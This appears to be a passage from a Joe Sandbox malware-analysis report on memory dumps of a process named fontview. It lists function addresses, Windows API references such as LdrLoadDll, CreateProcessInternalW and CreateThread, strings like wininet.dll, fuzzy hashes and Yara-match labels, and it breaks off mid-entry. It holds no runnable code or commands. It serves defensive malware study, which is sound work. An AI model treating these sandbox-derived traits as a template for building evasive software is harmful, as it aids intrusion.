Opcode Fuzzy Hash: 75087595f7c948d0cadba87878a68dedbc95482f5345d51a770b7b9183ecbf68
Instruction Fuzzy Hash: 5090023124148803F5107158840474A10058BE1345F59C413A4425659D8799D9917121

Function 04402CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402CAA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4223404c5d768b60aa07b7444f8512756bbb82e5bb1f81b4c014ceb2b93bc45b
Instruction ID: 043d24ac4e9a789a5320714b934c9d8428611f8d3230bed6f6c6818214db2bfa
Opcode Fuzzy Hash: 4223404c5d768b60aa07b7444f8512756bbb82e5bb1f81b4c014ceb2b93bc45b
Instruction Fuzzy Hash: 0290023124140403F5007598540864610058BF1345F55D013A5025556EC769D9916131

Function 04402D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402D1A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ad9b7d946fe28357cb42fee375cf8853ba05b274a0bb9b9feee75f4bf25c3ed
Instruction ID: 3216f713d8116c45f3c5ebcb2a178deb94fb5ec2d86c0e98551ec1232c5db261
Opcode Fuzzy Hash: 3ad9b7d946fe28357cb42fee375cf8853ba05b274a0bb9b9feee75f4bf25c3ed
Instruction Fuzzy Hash: A990023925340003F5807158540860A10058BE2246F95D417A0016559CCB19D9695321

Function 04402D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402D3A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b02840482ee2782fc5607d69299a8b3c783afbeffca4a3ed6d4971312d810fb
Instruction ID: 8ba2c1957b02a42ec97f3f5278310ed0f24930d302490c279cc5a4112c5ca675
Opcode Fuzzy Hash: 1b02840482ee2782fc5607d69299a8b3c783afbeffca4a3ed6d4971312d810fb
Instruction Fuzzy Hash: B090023134140003F540715854186065005DBF2345F55D013E0415555CDB19D9565222

Function 04402DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402DDA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3fca2a3fa502113b624b1fa250573c2f37e26767623612e88a013176a419973
Instruction ID: c069d8141719cdbd5e3f17e9d1875836d0f5bbfe92de225e60f7d4ac5faeb4d6
Opcode Fuzzy Hash: b3fca2a3fa502113b624b1fa250573c2f37e26767623612e88a013176a419973
Instruction Fuzzy Hash: D3900231282441537945B158440450750069BF1285795C013A1415951C872AE956D621

Function 04402DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402DFA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f47a6f9f7a4b96a5bfaa49f12541256607b177093adc0799d121a570871a7d6
Instruction ID: d0eb613351f20e02da8d8e2b19c6a3a1f0fcc3df012b9146b8c12c87000b4d3d
Opcode Fuzzy Hash: 0f47a6f9f7a4b96a5bfaa49f12541256607b177093adc0799d121a570871a7d6
Instruction Fuzzy Hash: 6790023124140413F5117158450470710098BE1285F95C413A0425559D975ADA52A121

Function 04402EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402EEA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d054f683d7a2ac910676475ad67fc11b8d5801092a4a07b3b1bbc9cc2eae3b36
Instruction ID: 06cce15b90b6ffedb4743f41592822b8a3c860790b8cbb79648b0a96a1e36015
Opcode Fuzzy Hash: d054f683d7a2ac910676475ad67fc11b8d5801092a4a07b3b1bbc9cc2eae3b36
Instruction Fuzzy Hash: 4590027124180403F5407558480460710058BE1346F55C013A2065556E8B2DDD516135

Function 04402E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402E8A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3091d9b7853852b0e94e70ab8af9cb4e45089f0c85898068da26a6412e23573
Instruction ID: 96418df98a581ffc3cee659a0850daeca0263319e85e7eeac015290340895a02
Opcode Fuzzy Hash: c3091d9b7853852b0e94e70ab8af9cb4e45089f0c85898068da26a6412e23573
Instruction Fuzzy Hash: 0190023164140503F50171584404616100A8BE1285F95C023A1025556ECB29DA92A131

Function 04402F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402F3A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4375c847d899e4d3ba0830c295e3253a1c85219c9df9ebfb76c626ff34f847f
Instruction ID: a7ce2791f5072b5cd1476b0016aa07a178e037f88c9b910e4ec52f56fbe405d5
Opcode Fuzzy Hash: c4375c847d899e4d3ba0830c295e3253a1c85219c9df9ebfb76c626ff34f847f
Instruction Fuzzy Hash: 6190027138140443F50071584414B061005CBF2345F55C017E1065555D871DDD526126

Function 04402FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402FEA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cab31306b175e6fa485d1276c051e219e1eed192356d282519e88ba5d8fd0bc7
Instruction ID: e9c6dd638d6c53178b32ce13802941adcd35ced40e9883255bb41b140558c27d
Opcode Fuzzy Hash: cab31306b175e6fa485d1276c051e219e1eed192356d282519e88ba5d8fd0bc7
Instruction Fuzzy Hash: 57900231251C0043F60075684C14B0710058BE1347F55C117A0155555CCB19D9615521

Function 04402FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402FBA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ccdb1fae37b99b1dd1d871ecbdefffa1be8ef56b76e2f172a83cc325792ac571
Instruction ID: f94e0f1393c7a6f3158c2e12b20ac0e7a64da0db0b5f0051dafc69c749f849d7
Opcode Fuzzy Hash: ccdb1fae37b99b1dd1d871ecbdefffa1be8ef56b76e2f172a83cc325792ac571
Instruction Fuzzy Hash: B3900231641400436540716888449065005AFF2255755C123A0999551D875DD9655665

Function 04402AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402ADA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 544c3a42bbf32a86203e742701dfca7b9c98d814644aa045338d061842b8f966
Instruction ID: 45d4803ea27f9e9fc69f8cc98015b39b32156d72899a6fee84c138ce3def998f
Opcode Fuzzy Hash: 544c3a42bbf32a86203e742701dfca7b9c98d814644aa045338d061842b8f966
Instruction Fuzzy Hash: B2900235251400032505B558070450710468BE6395355C023F1016551CD725D9615121

Function 04402AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402AFA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51d45f832286f8e095c2f6e5376e30e3eab39f6f01067da955879c4206e53c71
Instruction ID: 6016b1be4c497fbb163163c27bdc76704d65f7bfd1b80c54a99ffdaa6ab6a2a0
Opcode Fuzzy Hash: 51d45f832286f8e095c2f6e5376e30e3eab39f6f01067da955879c4206e53c71
Instruction Fuzzy Hash: 42900235261400032545B558060450B14459BE7395395C017F1417591CC725D9655321

Function 04402B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402B6A

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c02f8539718beaf7ece95b70b3de127e0b122cac66f10e6355646be5645ab6ea
Instruction ID: 033e49b9fc2072f357d6ee9acc9703349b02175f8689ee2f111514ea9acf2af0
Opcode Fuzzy Hash: c02f8539718beaf7ece95b70b3de127e0b122cac66f10e6355646be5645ab6ea
Instruction Fuzzy Hash: 9890027124240003650571584414616500A8BF1245B55C023E1015591DC729D9916125

Function 04402BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402BEA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b19adb1f47b92d8eb90145379a0e2e3fd3f286f2afff22ca2f423717fc455ade
Instruction ID: 26a5a4ad8bb5fe3508f06dd5eeeafcb38424b4ceed5083c1df024316c28df16e
Opcode Fuzzy Hash: b19adb1f47b92d8eb90145379a0e2e3fd3f286f2afff22ca2f423717fc455ade
Instruction Fuzzy Hash: 3390023124544843F54071584404A4610158BE1349F55C013A0065695D9729DE55B661

Function 04402BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402BFA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d9f307fda93681d489ac2113d0f676b33f8e99212f6b0e084b4e983c5db3104
Instruction ID: 9cd5a66be87b63c7460cb47cf77a0023b76848916fb6150cde3652bcf8b258de
Opcode Fuzzy Hash: 2d9f307fda93681d489ac2113d0f676b33f8e99212f6b0e084b4e983c5db3104
Instruction Fuzzy Hash: 8490023124140803F5807158440464A10058BE2345F95C017A0026655DCB19DB5977A1

Function 04402BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402BAA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cc5a318911c25a761f34e8c01a813056a84725f507e33ce2a6392f9c412e00d
Instruction ID: c3c1f6a1a8d89e79b37cfb27cdcf87b8bd5458722645503bf1217adbda9b17ab
Opcode Fuzzy Hash: 6cc5a318911c25a761f34e8c01a813056a84725f507e33ce2a6392f9c412e00d
Instruction Fuzzy Hash: DA90023164540803F5507158441474610058BE1345F55C013A0025655D8759DB5576A1

Function 044035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 044035CA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43ee7eaaf4be6e25a5d2e1faee4afbc6da2f514074cc06f84d516c54cf1d33d4
Instruction ID: 6ad3de6f259a7f7a4bf3767bcf894796585b2bdeffebc2ef33e3a6ca89ed2796
Opcode Fuzzy Hash: 43ee7eaaf4be6e25a5d2e1faee4afbc6da2f514074cc06f84d516c54cf1d33d4
Instruction Fuzzy Hash: 4B90023164550403F5007158451470620058BE1245F65C413A0425569D8799DA5165A2

Function 044039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 044039BA

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17ee63bfa03f7ced375569f7e5ec1fca03055bab94a2ae45d05b1d01ff9b8d98
Instruction ID: 74ec8df5a3dd1fcaf1282c729c2c4aa67fbe7bfa9046e37e96afcc757796e42d
Opcode Fuzzy Hash: 17ee63bfa03f7ced375569f7e5ec1fca03055bab94a2ae45d05b1d01ff9b8d98
Instruction Fuzzy Hash: 3890023128545103F550715C44046165005ABF1245F55C023A0815595D8759D9556221

Function 00193AD0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00193BAB

Strings

wininet.dll, xrefs: 00193B3E, 00193B4A
net.dll, xrefs: 00193B67, 00193BF6, 00193BD6, 00193BE2, 00193C02

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 389ddc0aae5f4288e5f4bdb1a4ac04a6678bec9637d89c9791f503dfcdfda9d3
Instruction ID: 59a1a03e488d54796e415ca35283a40e2b1e8513d05707c838bf6d5dd509759f
Opcode Fuzzy Hash: 389ddc0aae5f4288e5f4bdb1a4ac04a6678bec9637d89c9791f503dfcdfda9d3
Instruction Fuzzy Hash: A5318EB1A00605BBDB14DFA4CC81FEBB7B8EB88710F14411DF61EAB241D770AA54CBA5

Function 0018F549 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0018F567
CoUninitialize.COMBASE ref: 0018F64E

Strings

@J7<, xrefs: 0018F57B

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: a8fc16ebf5da1488c97c317e3b6e1b49fba9c691ec79d9d38a511b5537b53bec
Instruction ID: 50b619419e2d67b9b45407577029551e85ae2cb4c7548022f507b5581ceb0024
Opcode Fuzzy Hash: a8fc16ebf5da1488c97c317e3b6e1b49fba9c691ec79d9d38a511b5537b53bec
Instruction Fuzzy Hash: 993152B5A0060AAFDB10DFD8D8809EEB7B9FF88304B148559E515EB214D775EE02CFA0

Function 0018F550 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0018F567
CoUninitialize.COMBASE ref: 0018F64E

Strings

@J7<, xrefs: 0018F57B

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: cf522a768a4222b01e150beada45b992bbcc798a308b0f974cd88edb7dc03caa
Instruction ID: 5cfb9d1841b5daf62ab60759012110770a23cda9a01a27a485e5911e7a06cc22
Opcode Fuzzy Hash: cf522a768a4222b01e150beada45b992bbcc798a308b0f974cd88edb7dc03caa
Instruction Fuzzy Hash: 633130B5A0020AAFDB10DFD8D8809EFB7B9FF88304F108559E505EB214D775EE068BA0

Function 0018463D Relevance: 1.6, APIs: 1, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001845F2

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: f2d14ee1e7492503946815e61b655c992f68404d0b02cc3cc4c9d8b133a63c09
Instruction ID: d250c839ec3893ceee916f0108907b4980a554f65e53c7f4f950b02e69b651d3
Opcode Fuzzy Hash: f2d14ee1e7492503946815e61b655c992f68404d0b02cc3cc4c9d8b133a63c09
Instruction Fuzzy Hash: FE11C73508050B9FCB20FFA8DC90ADDBBA4FF0372CB280299E8108F152E7214A56CBC1

Function 00184580 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001845F2

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b18edf98c350b0ea1304a1d31adb18bef4c879a074b46a0256bb5cefda4eb289
Instruction ID: 2faaf85be24c3ab72f0df4dc5d0f0fe5568d00a39547026403847bd305428fc2
Opcode Fuzzy Hash: b18edf98c350b0ea1304a1d31adb18bef4c879a074b46a0256bb5cefda4eb289
Instruction Fuzzy Hash: DB01E1B5D4020EABDF10EBE4DD42FAEB7789B54708F404195E90897241FB71EB58CB91

Function 00199940 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,0018834E,00000010,?,?,?,00000044,?,00000010,0018834E,?,?,?), ref: 0019999D

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: ecd7d136f9bca975ae8b4a1b71ba7ca380b8253d596d3c4a62ff227ae76bca2f
Instruction ID: c6e949d8564391c3e617b5f2c0243521b934876a6cff9209ae5ef879768fd019
Opcode Fuzzy Hash: ecd7d136f9bca975ae8b4a1b71ba7ca380b8253d596d3c4a62ff227ae76bca2f
Instruction Fuzzy Hash: 4C0192B2214508BBCB44DE99DC81EEB77BDAF8C754F508108BA19E3255D630F851CBA5

Function 00179E50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00179E95

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a1ae6329cf9e8cea846ede1530722b0c3a5d5c82fdf4c53d8ac4c5522e06b1c0
Instruction ID: 742bf39489541dfb3b4eefffa620b2dbd672efabb38c42b2295208ddd3a149b8
Opcode Fuzzy Hash: a1ae6329cf9e8cea846ede1530722b0c3a5d5c82fdf4c53d8ac4c5522e06b1c0
Instruction Fuzzy Hash: 63F0657338021436D72065E9DC42FDB779DDB917A1F540025F70DDB1C1D996B94142E5

Function 00179E4A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00179E95

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: bb4728914d3d254eaf74f91b3494e1f75d8f65da464da1fd5fb79ca9377dc0bc
Instruction ID: c4a117fa943c888a4674dd1b134df5f2aced936536a13480b012b1801eb23873
Opcode Fuzzy Hash: bb4728914d3d254eaf74f91b3494e1f75d8f65da464da1fd5fb79ca9377dc0bc
Instruction Fuzzy Hash: 5AF0E53324030036D33166A9CC43FDB7BACCF857A0F140419F68CAB1C1D995B94183E8

Function 00199860 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

